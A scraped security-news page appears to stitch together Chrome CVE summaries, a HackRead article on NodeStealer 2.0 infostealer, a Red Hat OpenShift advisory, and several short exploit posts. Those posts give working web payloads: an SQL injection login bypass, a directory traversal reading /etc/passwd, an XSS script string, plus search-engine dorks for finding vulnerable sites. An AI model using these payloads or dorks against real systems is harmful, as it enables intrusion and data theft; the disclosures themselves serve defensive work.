Use after free in Cast in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4075

Use after free in Blink Task Scheduling in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4074

Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4070

Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4069

By Deeba Ahmed
NodeStealer 2.0 is a variant of the NodeStealer infostealing malware, which was taken down by Meta in May 2023.
This is a post from HackRead.com Read the original post: NodeStealer 2.0 Poses as ‘Microsoft’ to Hack Facebook and Browser Data

**IN SUMMARY**

1.  **Palo Alto Networks’ Unit 42 identified and reported NodeStealer 2.0.**
2.  **The Python-based malware steals crypto, Facebook and browser data.**
3.  **It spreads through phishing, masquerading as advertising opportunities.**
4.  **NodeStealer 2.0 campaign originated in Vietnam.**

Phishing scams targeting Facebook business accounts to conduct advertising frauds or account takeovers are on the rise, which is a concerning trend. Recently Hackread published MalwareBytes’ Jerome Segura’s **research** on fake Meta ad managers and Chrome extensions allowing attackers to lure business account holders into making ad investments to increase sales revenues.

Now Palo Alto Networks’ Unit 42 researchers have **shared** details of a new phishing attack distributing a brand-new version of a deadly information stealer NodeStealer. This new version is dubbed NodeStealer 2.0, which also targets Facebook business accounts. Researchers believe this trend of targeting Facebook business accounts started in July 2022 with the emergence of the **Ducktail infostealer**. 

NodeStealer malware was detected and taken down by Meta in May 2023. It could steal browser cookies to hijack Facebook business accounts, commendably perform ad frauds, steal account credentials and download additional payloads, etc.

In this campaign, the attack chain starts with a phishing lure, for instance, offering tools like spreadsheet templates for businesses. Previously, we have seen **ChatGPT-inspired scams** offering malicious extensions to business account users. 

NodeStealer 2.0r is similar to its predecessor, using phishing tactics to lure users and distributing malware-infected executable files in the guise of advertising opportunities. Victims are lured into downloading a .ZIP file from reputable Cloud file storage providers to gain their trust, but they get their devices infected.

Screenshot of a Facebook phishing scam tricking users into downloading .ZIP file (Screenshot: Palo Alto Networks’ Unit 42)

According to Unit 42’s **report**, NodeStealer 2.0 has additional features such as downloader and cryptocurrency stealing capabilities and a complete takeover of Facebook business accounts. The first attack in which NodeStealer 2.0 was used was discovered in December 2022, mainly targeting Facebook pages.

It is worth noting that both versions (named by Unit 42 as Variant 1 and Variant 2) are written in Python language. NodeStealer 2.0 posed as Microsoft Corporation and can steal emails, Facebook accounts, and even boasts anti-analysis features.

> The second variant of the infostealer in the campaign was internally named MicrosofOffice.exe and was compiled with Nuitka, the same as the first variant. Unlike the first variant, it does not generate a lot of activity visible to the unsuspecting user. For this variant, the threat actor used the product name “Microsoft Coporation” (originally misspelled by the malware authors).
> 
> Lior Rochberger – Palo Alto Networks’ Unit 42

NodeStealer 2.0 campaign originated in Vietnam, and as per researchers, it is no more active. The Vietnamese link was identified because previous campaigns involving **Ducktail and NodeStealer** were launched by threat actors based in Vietnam. 

Malware seen stealing passwords from a targeted browse (Screenshot: Palo Alto Networks’ Unit 42)

However, it could be part of a larger campaign where attackers are using different methods to target Facebook business account holders for monetary gains. NodeStealer 2.0 seems a continuation of the same agenda, which can cause huge financial losses for organizations, and users get exposed to additional threats due to credential leaks, apart from reputational damage.

Visit this link to check out the **indicators of compromise**. This is becoming a raging threat; therefore, organizations and Facebook business account holders must remain cautious while downloading executables. Using strong passwords with MFA and training employees to detect phishing lures can prove crucial in safeguarding your privacy and data on social media.

**RELATED ARTICLES**

1.  Fake ChatGPT Extension Hijacks Facebook Accounts
2.  Phishers Now Actively Automating Scams with Telegram
3.  Alert: Scammers Pose as ChatGPT in New Phishing Scam
4.  Fake ChatGPT, AI pages on Facebook spread infostealers
5.  Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer

NodeStealer 2.0 Poses as ‘Microsoft’ to Hack Facebook and Browser Data

Red Hat Security Advisory 2023-4341-01 - Red Hat OpenShift bug fix and security update. Red Hat Product Security has rated this update as having a security impact of Low. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.7.4 - Red Hat OpenShift bug fix and security update  
Advisory ID:       RHSA-2023:4341-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4341  
Issue date:        2023-08-02  
CVE Names:         CVE-2022-25883 CVE-2023-22796   
=====================================================================

1. Summary:

Logging Subsystem 5.7.4 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.7.4 - Red Hat OpenShift

Security Fix(es):

* nodejs-semver: Regular expression denial of service (CVE-2022-25883)

* rubygem-activesupport: Regular Expression Denial of Service  
(CVE-2023-22796)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2164736 - CVE-2023-22796 rubygem-activesupport: Regular Expression Denial of Service  
2216475 - CVE-2022-25883 nodejs-semver: Regular expression denial of service

5. JIRA issues fixed (https://issues.redhat.com/):

LOG-2701 - [Vector] [Cloudwatch] namespaceUUID is not added to logGroupName when forwarding logs to Cloudwatch.  
LOG-3880 - Deprecated `curation` and `forwarder` are displayed in the console when creating clusterlogging via `Form view`.   
LOG-4015 - [Vector][Loki] vector_component_sent_bytes_total metric for Loki sink not exposed by vector.  
LOG-4073 - Invalid link to doc from installed operator in OpenShift Web Console  
LOG-4237 - Regression with Red Hat OpenShift Logging 5.7.2   
LOG-4242 - Vector pods raise `Configuration error` when forwarding to cloudwatch/googlecloudlogging with tlsSecurityProfile configured.  
LOG-4275 - [release-5.7] Vector pods going into a panic state   
LOG-4302 - CLO raises error message "URL not secure: , but output gcp-logging has TLS configuration parameters" if add tls.securityProfile to CLF when forwarding to googlecloudlogging/cloudwatch.  
LOG-4361 - [release-5.7] Setting custom options on the application tenant removes user-alertmanager configuration  
LOG-4368 - [release-5.7] sts cloudwatch issues after upgrading from 5.5  
LOG-4389 - [release-5.7] Query Label Values from Loki return duplicate values.

6. References:

https://access.redhat.com/security/cve/CVE-2022-25883  
https://access.redhat.com/security/cve/CVE-2023-22796  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkymZDAAoJENzjgjWX9erEOvsP/1qyYiieOWJY/r4PPOJ6nYDH  
t+CegcwyG9rGlMn0+UibYtmmuiH4iYRV+iWDcU9h1yeGWt1Xp1BYS1lOTZ2+1rao  
FmiTGZoOLJXeBhy2ZTMm6JG6HCCazUVlLLlQyXU2SZ24l/2fi9OZ4zl/1Dn6tibZ  
YW7EHpuJRv5WqJHOrYZi4AoMj1DZYHsAuZDF/eqT92liwypJD2dsYt8FM19BeiTG  
9hSEV0YSU+BG+41sLs5dP/sUp1SE1vm31/zRCZPxSRaQPnABapTMpvnrPHIUgSa0  
iPTzYcTLiBsLL7wEz7zrvtKvLcZyyY/O59Id/n1qLP4RXUFgmYKe2x63fOxLVbX5  
n4aY9tfmEuyWqji90NTHvtKI+HAHmJoKZRLm6alBDXQuotId/IWrY8/XipIQWEtC  
CZC4eZ/DjtBeacO1coRhUc6uNigxik/nEmZ+F4v3MyooTm82RBbVOcEyQH2H/cZ4  
902EYa2kmLJSj4EndkV0KWlWUHf12nEF3rvpX8CtVlaGvs8a+76eGEQjEH7oZS1D  
rWw6IWxkd9wqnzIqv++qOwW2VTKkgpUDR1AwoJ+kxqewoYZj3W821m2HAskuVqGj  
xjSFyFNZOtQhvMEy6rgZA3seSaoK+RiP7KcrOAfq+Ay8LYZYLkkjwt8DI5B5Au8G  
FFwpxI/YB+KCwc2hUxVH  
=hBt4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4341-01

Cryptolive CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Cryptolive cms v1.0 Auth by pass Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://scriptmafia.org/                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] user & pass : 1'or'1'='1[+] Panel : https://127.0.0.1/cryptoinlivecom/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Cryptolive CMS 1.0 SQL Injection

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

CREDITS PREVICINI CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CREDITS PREVICINI CMS v1.02 Xss Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.previcinidesign.com/                                                                                    |  | # Dork      : inurl:id= Or Web by PREVICINIDESIGN & php?id=                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/amarcordpiadineriait/notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CREDITS PREVICINI CMS 1.02 Cross Site Scripting

Creative Commons Attribution version 3.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Creative Commons Attribution v3.0 Sql Injection Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://creativecommons.org/licenses/by/3.0/                                                                       |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/demonstrationchapelorg/fullnews.php?id=3 <=====| inject herePanel :http://127.0.0.1/demonstrationchapelorg/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#google